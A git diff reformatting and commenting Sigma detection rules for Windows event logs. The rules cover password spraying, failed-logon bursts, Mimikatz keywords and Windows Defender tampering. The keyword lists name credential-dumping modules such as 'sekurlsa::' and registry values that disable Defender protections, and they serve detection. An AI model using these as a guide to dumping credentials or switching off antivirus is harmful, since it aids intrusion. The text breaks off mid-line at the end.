https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying - https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing @@ -25,8 +24,7 @@ detection: filter: ProcessName: '-' timeframe: 24h - condition: (security and selection1 and not filter) | count(TargetUserName) by - ProcessName > 10 + condition: (security and selection1 and not filter) | count(TargetUserName) by ProcessName > 10 falsepositives: - Terminal servers - Jump servers diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source.yml index 7414cef42..cd9967929 100644 --- a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source.yml +++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source.yml @@ -1,8 +1,7 @@ title: Failed Logins with Different Accounts from Single Source System id: e98374a6-e2d9-4076-9b5c-11bdb2569995 status: unsupported -description: Detects suspicious failed logins with different user accounts from a - single source system +description: Detects suspicious failed logins with different user accounts from a single source system author: Florian Roth (Nextron Systems) date: 2017/01/10 modified: 2023/02/24 @@ -22,8 +21,7 @@ detection: - 4625 TargetUserName: '*' WorkstationName: '*' - condition: (security and selection1) | count(TargetUserName) by WorkstationName - > 3 + condition: (security and selection1) | count(TargetUserName) by WorkstationName > 3 falsepositives: - Terminal servers - Jump servers diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source2.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source2.yml index 2d51cefb1..288ec4a8b 100644 --- a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source2.yml +++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source2.yml @@ -1,11 +1,10 @@ title: Failed NTLM Logins with Different Accounts from Single Source System id: 6309ffc4-8fa2-47cf-96b8-a2f72e58e538 related: - - id: e98374a6-e2d9-4076-9b5c-11bdb2569995 - type: derived + - id: e98374a6-e2d9-4076-9b5c-11bdb2569995 + type: derived status: unsupported -description: Detects suspicious failed logins with different user accounts from a - single source system +description: Detects suspicious failed logins with different user accounts from a single source system author: Florian Roth (Nextron Systems) date: 2017/01/10 modified: 2023/02/24 @@ -24,8 +23,7 @@ detection: TargetUserName: '*' Workstation: '*' timeframe: 24h - condition: (security and selection2) | count(TargetUserName) by Workstation > - 3 + condition: (security and selection2) | count(TargetUserName) by Workstation > 3 falsepositives: - Terminal servers - Jump servers diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos.yml index 9b72c840a..6d377109b 100644 --- a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos.yml +++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos.yml @@ -1,8 +1,7 @@ title: Valid Users Failing to Authenticate From Single Source Using Kerberos id: 5d1d946e-32e6-4d9a-a0dc-0ac022c7eb98 status: unsupported -description: Detects multiple failed logins with multiple valid domain accounts from - a single source system using the Kerberos protocol. +description: Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol. references: - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying author: Mauricio Velazco, frack113 @@ -24,8 +23,7 @@ detection: filter_computer: TargetUserName|endswith: $ timeframe: 24h - condition: (security and selection and not filter_computer) | count(TargetUserName) - by IpAddress > 10 + condition: (security and selection and not filter_computer) | count(TargetUserName) by IpAddress > 10 falsepositives: - Vulnerability scanners - Misconfigured systems diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos2.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos2.yml index 2fa17b13e..36a78a5db 100644 --- a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos2.yml +++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos2.yml @@ -1,8 +1,7 @@ title: Disabled Users Failing To Authenticate From Source Using Kerberos id: 4b6fe998-b69c-46d8-901b-13677c9fb663 status: unsupported -description: Detects failed logins with multiple disabled domain accounts from a single - source system using the Kerberos protocol. +description: Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol. references: - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying author: Mauricio Velazco, frack113 @@ -24,8 +23,7 @@ detection: filter_computer: TargetUserName|endswith: $ timeframe: 24h - condition: (security and selection and not filter_computer) | count(TargetUserName) - by IpAddress > 10 + condition: (security and selection and not filter_computer) | count(TargetUserName) by IpAddress > 10 falsepositives: - Vulnerability scanners - Misconfigured systems diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos3.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos3.yml index 3acd6ea2c..390f9878f 100644 --- a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos3.yml +++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_kerberos3.yml @@ -1,8 +1,7 @@ title: Invalid Users Failing To Authenticate From Source Using Kerberos id: bc93dfe6-8242-411e-a2dd-d16fa0cc8564 status: unsupported -description: Detects failed logins with multiple invalid domain accounts from a single - source system using the Kerberos protocol. +description: Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol. references: - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying author: Mauricio Velazco, frack113 @@ -24,8 +23,7 @@ detection: filter_computer: TargetUserName|endswith: $ timeframe: 24h - condition: (security and selection and not filter_computer) | count(TargetUserName) - by IpAddress > 10 + condition: (security and selection and not filter_computer) | count(TargetUserName) by IpAddress > 10 falsepositives: - Vulnerability scanners - Misconfigured systems diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm.yml index 43fb00054..aa52ec356 100644 --- a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm.yml +++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm.yml @@ -1,8 +1,7 @@ title: Valid Users Failing to Authenticate from Single Source Using NTLM id: f88bab7f-b1f4-41bb-bdb1-4b8af35b0470 status: unsupported -description: Detects failed logins with multiple valid domain accounts from a single - source system using the NTLM protocol. +description: Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol. references: - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying author: Mauricio Velazco @@ -20,12 +19,11 @@ detection: Channel: Security selection1: EventID: 4776 - Status: '*0xC000006A' + Status: '*0xC000006A' #Account logon with misspelled or bad password. filter: TargetUserName: '*$' timeframe: 24h - condition: (security and selection1 and not filter) | count(TargetUserName) by - Workstation > 10 + condition: (security and selection1 and not filter) | count(TargetUserName) by Workstation > 10 falsepositives: - Terminal servers - Jump servers diff --git a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm2.yml b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm2.yml index 44ab6de41..155d41659 100644 --- a/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm2.yml +++ b/sigma/builtin/unsupported/win_security_susp_failed_logons_single_source_ntlm2.yml @@ -1,8 +1,7 @@ title: Invalid Users Failing To Authenticate From Single Source Using NTLM id: 56d62ef8-3462-4890-9859-7b41e541f8d5 status: unsupported -description: Detects failed logins with multiple invalid domain accounts from a single - source system using the NTLM protocol. +description: Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol. references: - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying author: Mauricio Velazco @@ -20,12 +19,11 @@ detection: Channel: Security selection1: EventID: 4776 - Status: '*0xC0000064' + Status: '*0xC0000064' # The username you typed does not exist. Bad username. filter: TargetUserName: '*$' timeframe: 24h - condition: (security and selection1 and not filter) | count(TargetUserName) by - Workstation > 10 + condition: (security and selection1 and not filter) | count(TargetUserName) by Workstation > 10 falsepositives: - Terminal servers - Jump servers diff --git a/sigma/builtin/unsupported/win_security_susp_failed_remote_logons_single_source.yml b/sigma/builtin/unsupported/win_security_susp_failed_remote_logons_single_source.yml index 87599876b..a97fb5f96 100644 --- a/sigma/builtin/unsupported/win_security_susp_failed_remote_logons_single_source.yml +++ b/sigma/builtin/unsupported/win_security_susp_failed_remote_logons_single_source.yml @@ -1,8 +1,7 @@ title: Multiple Users Remotely Failing To Authenticate From Single Source id: add2ef8d-dc91-4002-9e7e-f2702369f53a status: unsupported -description: Detects a source system failing to authenticate against a remote host - with multiple users. +description: Detects a source system failing to authenticate against a remote host with multiple users. references: - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying author: Mauricio Velazco @@ -24,8 +23,7 @@ detection: filter: IpAddress: '-' timeframe: 24h - condition: (security and selection1 and not filter) | count(TargetUserName) by - IpAddress > 10 + condition: (security and selection1 and not filter) | count(TargetUserName) by IpAddress > 10 falsepositives: - Terminal servers - Jump servers diff --git a/sigma/builtin/unsupported/win_security_susp_multiple_files_renamed_or_deleted.yml b/sigma/builtin/unsupported/win_security_susp_multiple_files_renamed_or_deleted.yml index bcaa2782f..e979ad860 100644 --- a/sigma/builtin/unsupported/win_security_susp_multiple_files_renamed_or_deleted.yml +++ b/sigma/builtin/unsupported/win_security_susp_multiple_files_renamed_or_deleted.yml @@ -1,8 +1,7 @@ title: Suspicious Multiple File Rename Or Delete Occurred id: 97919310-06a7-482c-9639-92b67ed63cf8 status: unsupported -description: Detects multiple file rename or delete events occurrence within a specified - period of time by a same user (these events may signalize about ransomware activity). +description: Detects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity). references: - https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html author: Vasiliy Burov, oscd.community @@ -14,9 +13,7 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Audit Policy : Policies/Windows Settings/Security Settings/Local - Policies/Audit Policy/Audit object access, Policies/Windows Settings/Security - Settings/Advanced Audit Policy Configuration/Object Access' + definition: 'Requirements: Audit Policy : Policies/Windows Settings/Security Settings/Local Policies/Audit Policy/Audit object access, Policies/Windows Settings/Security Settings/Advanced Audit Policy Configuration/Object Access' detection: security: Channel: Security diff --git a/sigma/builtin/unsupported/win_security_susp_samr_pwset.yml b/sigma/builtin/unsupported/win_security_susp_samr_pwset.yml index 8d6971e0b..85a565653 100644 --- a/sigma/builtin/unsupported/win_security_susp_samr_pwset.yml +++ b/sigma/builtin/unsupported/win_security_susp_samr_pwset.yml @@ -1,13 +1,9 @@ title: Possible Remote Password Change Through SAMR id: 7818b381-5eb1-4641-bea5-ef9e4cfb5951 status: unsupported -description: 'Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() - or SamSetInformationUser(). - - "Audit User Account Management" in "Advanced Audit Policy Configuration" has to - be enabled in your local security policy / GPO to see this events. - - ' +description: | + Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser(). + "Audit User Account Management" in "Advanced Audit Policy Configuration" has to be enabled in your local security policy / GPO to see this events. author: Dimitrios Slamaris date: 2017/06/09 modified: 2023/02/24 @@ -26,9 +22,8 @@ detection: passwordchanged: EventID: 4738 passwordchanged_filter: - PasswordLastSet: null + PasswordLastSet: timeframe: 15s - condition: security and (( passwordchanged and not passwordchanged_filter ) | - near samrpipe) + condition: security and (( passwordchanged and not passwordchanged_filter ) | near samrpipe) level: medium ruletype: Sigma diff --git a/sigma/builtin/unsupported/win_system_rare_service_installs.yml b/sigma/builtin/unsupported/win_system_rare_service_installs.yml index 696c0dd1e..550ae784f 100644 --- a/sigma/builtin/unsupported/win_system_rare_service_installs.yml +++ b/sigma/builtin/unsupported/win_system_rare_service_installs.yml @@ -1,9 +1,7 @@ title: Rare Service Installations id: 66bfef30-22a5-4fcd-ad44-8d81e60922ae status: unsupported -description: Detects rare service installs that only appear a few times per time frame - and could reveal password dumpers, backdoor installs or other types of malicious - services +description: Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services author: Florian Roth (Nextron Systems) date: 2017/03/08 modified: 2023/02/24 diff --git a/sigma/builtin/unsupported/win_taskscheduler_rare_schtask_creation.yml b/sigma/builtin/unsupported/win_taskscheduler_rare_schtask_creation.yml index c5f94bb89..09e8dc043 100644 --- a/sigma/builtin/unsupported/win_taskscheduler_rare_schtask_creation.yml +++ b/sigma/builtin/unsupported/win_taskscheduler_rare_schtask_creation.yml @@ -1,9 +1,7 @@ title: Rare Scheduled Task Creations id: b20f6158-9438-41be-83da-a5a16ac90c2b status: unsupported -description: This rule detects rare scheduled task creations. Typically software gets - installed on multiple systems and not only on a few. The aggregation and count - function selects tasks with rare names. +description: This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names. author: Florian Roth (Nextron Systems) date: 2017/03/17 modified: 2023/02/24 @@ -14,8 +12,7 @@ tags: logsource: product: windows service: taskscheduler - definition: the "Microsoft-Windows-TaskScheduler/Operational" is disabled by default - and should be enabled in order for this detection to work + definition: the "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and should be enabled in order for this detection to work detection: taskscheduler: Channel: Microsoft-Windows-TaskScheduler/Operational @@ -24,8 +21,7 @@ detection: filter1: TaskName: \Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan timeframe: 7d - condition: (taskscheduler and selection and not 1 of filter*) | count() by TaskName - < 5 + condition: (taskscheduler and selection and not 1 of filter*) | count() by TaskName < 5 falsepositives: - Software installation level: low diff --git a/sigma/builtin/win_alert_mimikatz_keywords.yml b/sigma/builtin/win_alert_mimikatz_keywords.yml index 653cb3d11..ef1feb11b 100644 --- a/sigma/builtin/win_alert_mimikatz_keywords.yml +++ b/sigma/builtin/win_alert_mimikatz_keywords.yml @@ -1,9 +1,7 @@ title: Mimikatz Use id: 06d71506-7beb-4f22-8888-e2e5e2ca7fd8 status: test -description: This method detects mimikatz keywords in different Eventlogs (some of - them only appear in older Mimikatz version that are however still used by different - threat groups) +description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups) references: - https://tools.thehacker.recipes/mimikatz/modules author: Florian Roth (Nextron Systems), David ANDRE (additional keywords) @@ -44,7 +42,7 @@ detection: - privilege::driver - 'sekurlsa::' filter: - EventID: 15 + EventID: 15 # Sysmon's FileStream Events (could cause false positives when Sigma rules get copied on/to a system) condition: keywords and not filter falsepositives: - Naughty administrators diff --git a/sigma/builtin/windefend/win_defender_antimalware_platform_expired.yml b/sigma/builtin/windefend/win_defender_antimalware_platform_expired.yml index 603cf8d29..69554c139 100644 --- a/sigma/builtin/windefend/win_defender_antimalware_platform_expired.yml +++ b/sigma/builtin/windefend/win_defender_antimalware_platform_expired.yml @@ -1,19 +1,16 @@ title: Windows Defender Grace Period Expired id: 360a1340-398a-46b6-8d06-99b905dc69d2 related: - - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 - type: obsoletes + - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 + type: obsoletes status: stable -description: 'Detects the expiration of the grace period of Windows Defender. This - means protection against viruses, spyware, and other potentially unwanted software - is disabled. - - ' +description: | + Detects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled. references: - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5101 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/ -author: "J\xE1n Tren\u010Dansk\xFD, frack113" +author: Ján Trenčanský, frack113 date: 2020/07/28 modified: 2023/11/22 tags: @@ -26,7 +23,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 5101 + EventID: 5101 # The antimalware platform is expired. condition: windefend and selection falsepositives: - Unknown diff --git a/sigma/builtin/windefend/win_defender_asr_lsass_access.yml b/sigma/builtin/windefend/win_defender_asr_lsass_access.yml index 31bb77bab..35d1896fc 100644 --- a/sigma/builtin/windefend/win_defender_asr_lsass_access.yml +++ b/sigma/builtin/windefend/win_defender_asr_lsass_access.yml @@ -13,9 +13,7 @@ tags: logsource: product: windows service: windefend - definition: 'Requirements:Enabled Block credential stealing from the Windows local - security authority subsystem (lsass.exe) from Attack Surface Reduction (GUID: - 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2)' + definition: 'Requirements:Enabled Block credential stealing from the Windows local security authority subsystem (lsass.exe) from Attack Surface Reduction (GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2)' detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational diff --git a/sigma/builtin/windefend/win_defender_asr_psexec_wmi.yml b/sigma/builtin/windefend/win_defender_asr_psexec_wmi.yml index 9549477a2..5ec0ca444 100644 --- a/sigma/builtin/windefend/win_defender_asr_psexec_wmi.yml +++ b/sigma/builtin/windefend/win_defender_asr_psexec_wmi.yml @@ -1,8 +1,7 @@ title: PSExec and WMI Process Creations Block id: 97b9ce1e-c5ab-11ea-87d0-0242ac130003 status: test -description: Detects blocking of process creations originating from PSExec and WMI - commands +description: Detects blocking of process creations originating from PSExec and WMI commands references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands - https://twitter.com/duff22b/status/1280166329660497920 @@ -17,8 +16,7 @@ tags: logsource: product: windows service: windefend - definition: 'Requirements:Enabled Block process creations originating from PSExec - and WMI commands from Attack Surface Reduction (GUID: d1e49aac-8f56-4280-b9ba-993a6d77406c)' + definition: 'Requirements:Enabled Block process creations originating from PSExec and WMI commands from Attack Surface Reduction (GUID: d1e49aac-8f56-4280-b9ba-993a6d77406c)' detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational diff --git a/sigma/builtin/windefend/win_defender_config_change_exclusion_added.yml b/sigma/builtin/windefend/win_defender_config_change_exclusion_added.yml index c1b80e8eb..0fd1164e0 100644 --- a/sigma/builtin/windefend/win_defender_config_change_exclusion_added.yml +++ b/sigma/builtin/windefend/win_defender_config_change_exclusion_added.yml @@ -17,7 +17,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 5007 + EventID: 5007 # The antimalware platform configuration changed. NewValue|contains: \Microsoft\Windows Defender\Exclusions condition: windefend and selection falsepositives: diff --git a/sigma/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml b/sigma/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml index 7e5202cb1..6fee59c58 100644 --- a/sigma/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml +++ b/sigma/builtin/windefend/win_defender_config_change_exploit_guard_tamper.yml @@ -1,10 +1,8 @@ title: Windows Defender Exploit Guard Tamper id: a3ab73f1-bd46-4319-8f06-4b20d0617886 status: test -description: 'Detects when someone is adding or removing applications or folders from - exploit guard "ProtectedFolders" or "AllowedApplications" - - ' +description: | + Detects when someone is adding or removing applications or folders from exploit guard "ProtectedFolders" or "AllowedApplications" references: - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088 author: Nasreddine Bencherchali (Nextron Systems) @@ -20,20 +18,20 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational allowed_apps_key: - EventID: 5007 - NewValue|contains: \Windows Defender\Windows Defender Exploit Guard\Controlled - Folder Access\AllowedApplications\ + EventID: 5007 # The antimalware platform configuration changed. + NewValue|contains: \Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\AllowedApplications\ allowed_apps_path: NewValue|contains: + # Add more paths you don't allow in your org - \Users\Public\ - \AppData\Local\Temp\ - \Desktop\ - \PerfLogs\ - \Windows\Temp\ protected_folders: - EventID: 5007 - OldValue|contains: \Windows Defender\Windows Defender Exploit Guard\Controlled - Folder Access\ProtectedFolders\ + EventID: 5007 # The antimalware platform configuration changed. + # This will trigger on any folder removal. If you experience FP's then add another selection with specific paths + OldValue|contains: \Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access\ProtectedFolders\ condition: windefend and (all of allowed_apps* or protected_folders) falsepositives: - Unlikely diff --git a/sigma/builtin/windefend/win_defender_config_change_sample_submission_consent.yml b/sigma/builtin/windefend/win_defender_config_change_sample_submission_consent.yml index 896474a69..46d1913d2 100644 --- a/sigma/builtin/windefend/win_defender_config_change_sample_submission_consent.yml +++ b/sigma/builtin/windefend/win_defender_config_change_sample_submission_consent.yml @@ -1,15 +1,14 @@ title: Windows Defender Submit Sample Feature Disabled id: 91903aba-1088-42ee-b680-d6d94fe002b0 related: - - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f - type: similar - - id: a3ab73f1-bd46-4319-8f06-4b20d0617886 - type: similar - - id: 801bd44f-ceed-4eb6-887c-11544633c0aa - type: similar + - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f + type: similar + - id: a3ab73f1-bd46-4319-8f06-4b20d0617886 + type: similar + - id: 801bd44f-ceed-4eb6-887c-11544633c0aa + type: similar status: stable -description: Detects disabling of the "Automatic Sample Submission" feature of Windows - Defender. +description: Detects disabling of the "Automatic Sample Submission" feature of Windows Defender. references: - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide - https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware @@ -25,7 +24,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 5007 + EventID: 5007 # The antimalware platform configuration changed. NewValue|contains: \Real-Time Protection\SubmitSamplesConsent = 0x0 condition: windefend and selection falsepositives: diff --git a/sigma/builtin/windefend/win_defender_history_delete.yml b/sigma/builtin/windefend/win_defender_history_delete.yml index b2656e6b6..87d454d7c 100644 --- a/sigma/builtin/windefend/win_defender_history_delete.yml +++ b/sigma/builtin/windefend/win_defender_history_delete.yml @@ -17,7 +17,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 1013 + EventID: 1013 # The antimalware platform deleted history of malware and other potentially unwanted software. condition: windefend and selection falsepositives: - Deletion of Defender malware detections history for legitimate reasons diff --git a/sigma/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml b/sigma/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml index b88e2fc26..5837256e1 100644 --- a/sigma/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml +++ b/sigma/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml @@ -1,16 +1,15 @@ title: Windows Defender Malware And PUA Scanning Disabled id: bc275be9-0bec-4d77-8c8f-281a2df6710f related: - - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 - type: obsoletes + - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 + type: obsoletes status: stable -description: Detects disabling of the Windows Defender feature of scanning for malware - and other potentially unwanted software +description: Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software references: - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5010 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/ -author: "J\xE1n Tren\u010Dansk\xFD, frack113" +author: Ján Trenčanský, frack113 date: 2020/07/28 modified: 2023/11/22 tags: @@ -23,7 +22,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 5010 + EventID: 5010 # Scanning for malware and other potentially unwanted software is disabled. condition: windefend and selection falsepositives: - Unknown diff --git a/sigma/builtin/windefend/win_defender_malware_detected_amsi_source.yml b/sigma/builtin/windefend/win_defender_malware_detected_amsi_source.yml index 48f4f28f4..335bacbfc 100644 --- a/sigma/builtin/windefend/win_defender_malware_detected_amsi_source.yml +++ b/sigma/builtin/windefend/win_defender_malware_detected_amsi_source.yml @@ -17,7 +17,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 1116 + EventID: 1116 # The antimalware platform detected malware or other potentially unwanted software. SourceName: AMSI condition: windefend and selection falsepositives: diff --git a/sigma/builtin/windefend/win_defender_real_time_protection_disabled.yml b/sigma/builtin/windefend/win_defender_real_time_protection_disabled.yml index ada017bc6..6f2029cdc 100644 --- a/sigma/builtin/windefend/win_defender_real_time_protection_disabled.yml +++ b/sigma/builtin/windefend/win_defender_real_time_protection_disabled.yml @@ -1,19 +1,16 @@ title: Windows Defender Real-time Protection Disabled id: b28e58e4-2a72-4fae-bdee-0fbe904db642 related: - - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 - type: obsoletes + - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 + type: obsoletes status: stable -description: 'Detects disabling of Windows Defender Real-time Protection. As this - event doesn''t contain a lot of information on who initaited this action you might - want to reduce it to a "medium" level if this occurs too many times in your environment - - ' +description: | + Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initaited this action you might want to reduce it to a "medium" level if this occurs too many times in your environment references: - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5001 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/ -author: "J\xE1n Tren\u010Dansk\xFD, frack113" +author: Ján Trenčanský, frack113 date: 2020/07/28 modified: 2023/11/22 tags: @@ -26,7 +23,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 5001 + EventID: 5001 # Real-time protection is disabled. condition: windefend and selection falsepositives: - Administrator actions (should be investigated) diff --git a/sigma/builtin/windefend/win_defender_real_time_protection_errors.yml b/sigma/builtin/windefend/win_defender_real_time_protection_errors.yml index 9626f506c..f952b1e6f 100644 --- a/sigma/builtin/windefend/win_defender_real_time_protection_errors.yml +++ b/sigma/builtin/windefend/win_defender_real_time_protection_errors.yml @@ -5,9 +5,8 @@ description: Detects issues with Windows Defender Real-Time Protection features references: - Internal Research - https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/ - - https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346 -author: Nasreddine Bencherchali (Nextron Systems), Christopher Peacock '@securepeacock' - (Update) + - https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346 # Contains the list of Feature Names (use for filtering purposes) +author: Nasreddine Bencherchali (Nextron Systems), Christopher Peacock '@securepeacock' (Update) date: 2023/03/28 modified: 2023/05/05 tags: @@ -21,16 +20,15 @@ detection: Channel: Microsoft-Windows-Windows Defender/Operational selection: EventID: - - 3002 - - 3007 + - 3002 # Real-Time Protection feature has encountered an error and failed + - 3007 # Real-time Protection feature has restarted filter_optional_network_inspection: - Feature_Name: '%%886' + Feature_Name: '%%886' # Network Inspection System Reason: - - '%%892' - - '%%858' + - '%%892' # The system is missing updates that are required for running Network Inspection System. Install the required updates and restart the device. + - '%%858' # Antimalware security intelligence has stopped functioning for an unknown reason. In some instances, restarting the service may resolve the problem. condition: windefend and (selection and not 1 of filter_optional_*) falsepositives: - - Some crashes can occur sometimes and the event doesn't provide enough information - to tune out these cases. Manual exception is required + - Some crashes can occur sometimes and the event doesn't provide enough information to tune out these cases. Manual exception is required level: medium ruletype: Sigma diff --git a/sigma/builtin/windefend/win_defender_restored_quarantine_file.yml b/sigma/builtin/windefend/win_defender_restored_quarantine_file.yml index 06f9e3fdb..0f5b15a1a 100644 --- a/sigma/builtin/windefend/win_defender_restored_quarantine_file.yml +++ b/sigma/builtin/windefend/win_defender_restored_quarantine_file.yml @@ -16,7 +16,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 1009 + EventID: 1009 # The antimalware platform restored an item from quarantine. condition: windefend and selection falsepositives: - Legitimate administrator activity restoring a file diff --git a/sigma/builtin/windefend/win_defender_suspicious_features_tampering.yml b/sigma/builtin/windefend/win_defender_suspicious_features_tampering.yml index f6390b2ec..d30c0f35e 100644 --- a/sigma/builtin/windefend/win_defender_suspicious_features_tampering.yml +++ b/sigma/builtin/windefend/win_defender_suspicious_features_tampering.yml @@ -1,12 +1,12 @@ title: Windows Defender Configuration Changes id: 801bd44f-ceed-4eb6-887c-11544633c0aa related: - - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f - type: similar - - id: a3ab73f1-bd46-4319-8f06-4b20d0617886 - type: similar - - id: 91903aba-1088-42ee-b680-d6d94fe002b0 - type: similar + - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f + type: similar + - id: a3ab73f1-bd46-4319-8f06-4b20d0617886 + type: similar + - id: 91903aba-1088-42ee-b680-d6d94fe002b0 + type: similar status: stable description: Detects suspicious changes to the Windows Defender configuration references: @@ -25,13 +25,17 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 5007 + EventID: 5007 # The antimalware platform configuration changed. NewValue|contains: + # TODO: Add more suspicious values - '\Windows Defender\DisableAntiSpyware ' + # - '\Windows Defender\Features\TamperProtection ' # Might produce FP - '\Windows Defender\Scan\DisableRemovableDriveScanning ' - '\Windows 